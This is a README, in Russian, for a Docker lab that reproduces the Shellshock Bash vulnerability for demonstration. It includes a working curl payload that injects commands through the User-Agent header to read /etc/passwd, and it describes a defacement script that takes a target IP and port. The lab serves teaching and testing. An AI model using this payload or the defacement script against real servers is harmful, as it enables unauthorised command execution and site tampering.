
Проект презентации CVE (ShellShock) с pdf, технической и воспроизводимой демонстрацией.
Этот проект позволяет воспроизвести уязвимость CVE-2014-6271, также известную как Shellshock. Shellshock — это уязвимость безопасности в Bash, которая позволяет выполнять вредоносный код через переменные окружения.
Цель этого проекта — продемонстрировать влияние данной уязвимости в среде Docker.
Перед началом убедитесь, что на вашем компьютере установлен Docker. Вы можете скачать Docker здесь.
В корневом каталоге проекта выполните следующую команду для сборки Docker-образа:
docker build -t ['image name'] .
Замените ['image name'] на имя, которое вы хотите присвоить Docker-образу.
После сборки образа запустите контейнер из этого образа с помощью следующей команды:
docker run -it --rm -p 8080:80 ['image name']
Это откроет доступ к сервису на порту 8080 вашего локального компьютера.
Откройте браузер и перейдите по адресу http://localhost:8080. Вы сможете наблюдать поведение приложения и протестировать уязвимость.
В другом терминале выполните следующую команду для эксплуатации уязвимости и чтения содержимого файла /etc/passwd:
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://localhost:8080/cgi-bin/vulnerable
Эта команда отправляет специально сформированный заголовок user-agent для эксплуатации Shellshock. Если уязвимость воспроизведена правильно, содержимое /etc/passwd отобразится в выводе терминала.
Этот скрипт позволяет эксплуатировать уязвимость для дефейса целевой веб-страницы. Уязвимость основана на неправильной конфигурации CGI-скриптов, что позволяет выполнять произвольные команды на сервере.
Предварительные требования: Убедитесь, что цель уязвима к ошибке ShellShock. Убедитесь, что у вас есть необходимые разрешения для тестирования эксплойта на этой цели.
./exp_deface.sh <ip> <port>
./exp_deface.sh localhost 8080
Важно: Данная уязвимость должна использоваться только в целях тестирования и демонстрации в контролируемой среде. Не используйте этот проект в производственных средах.